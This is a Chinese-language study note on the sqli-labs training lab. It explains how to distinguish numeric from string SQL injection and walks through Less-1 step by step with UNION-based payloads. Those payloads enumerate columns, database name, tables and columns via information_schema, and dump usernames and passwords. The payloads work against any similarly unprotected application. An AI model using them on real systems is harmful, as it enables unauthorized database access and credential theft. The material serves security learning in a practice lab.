sqli-labs学习笔记

判断注入类型

（1）首先判断是否存在sql注入点
对id=1的参数修改为id=1',来判断是否存在sql注入点。因为通过加入'，使后台的sql语句中单引号个数不匹配来导致sql语句报错。
如果不报错的话，也不一定是不存在sql注入点，也有可能是因为后端对'进行
了过滤。
（2）判断是什么注入类型
分为2种，为字符型注入和数字型注入。
1.使用id=1 and 1=1与id=1 and 1=2来判断数字型的注入。
如果后端是一个sql的查询语句，那么我们传入id参数后，后端的解析代码为：
select * from <表名> where id = x and 1=1,这里进行了与操作，因为1=1，所以最后的返回结果是正确的。
select * from <表名> where id = x and 1=2，这里也进行了与操作，但是最后1=2是错，所以与操作后，最后的结果是错，就会进行报错，从而验证是否为数字型注入。
再来看对于字符型注入来说：
select * from <表名> where id = 'x and 1=1'，这里因为加上了单引号，所以对于后面的与操作就不再表示与操作，而是全部转换为字符串进行解析。
2.使用id=1' and '1'='1与id=1' and '1'='2来判断是否为字符型注入
一样的判断方法，如果后端是一个sql查询语句，我们传入前面对应的id参数后，后端的解析代码为：
select * from <表名> where id ='x' and '1'='1',这样我们传入的id参数是最后执行的sql语句语法正确，最后的判断结果为正从而正常执行返回正常结果。
select * from <表名> where id ='x' and '1'='2',这样判断后的结果为否，从而不能正常执行sql语句，最后爆出sql语法的错误。

下面通过sqli-labs靶场对sql注入漏洞进行练习。
#less-1
前面知道了大概的判断方法，我们先判断这关是sql注入的哪种类型。
输入id=1,

我们得到了一个正常的回显，下面我们输入id=1’，来判断是否存在sql注入的漏洞。

报了sql语法的错误，说明存在sql注入的漏洞，我们下面测试是什么类型的sql注入。
进行数字型的sql注入判断：
id=1 and 1=1

正常回显了。
再输入id =1 and 1=2

也是正常回显，要求我们输入带有数字值的id。
那下面尝试字符型的注入：
id=1’ and ‘1’ = '1

回显正常，那再试
id =1’ and ‘1’ = ‘2

没有回显了，确定是字符型的注入。
知道是字符型注入就继续判断字段数。
输入 id =1’ order by 3 --+

回显没有报错，再试着输入4来判断是否为4个字段数。
id=1’ order by 4–+

报错，所以字段数应该为3.
下面进行查看显示位：
id= -1’ union select 1,2,3–+

回显的字段为2,3。这里输入-1，是为了让后台查询中，因为sql中没有-1，所以执行联合查询的后面语句。
知道了回显位，我们进行爆数据库。
id=-1’ union select 1,database(),version() --+

回显出了对应的数据库名称与数据库版本。
然后对输出的security数据库进行报表。
id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+

回显了对应的数据库下的表。
我们可以对users表中的字段名进行查询。
id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+

然后输出对应的字段名的数据。
id=-1’ union select 1,2,group_concat(id,username,password) from users --+

输出了对应的信息。

对源代码的分析

找到了对应的源代码，进行分析

对图片中后台sql查询的代码分析，可以看到这个闭合的方式单引号闭合。并且没有做其他的过滤，造成了sql注入。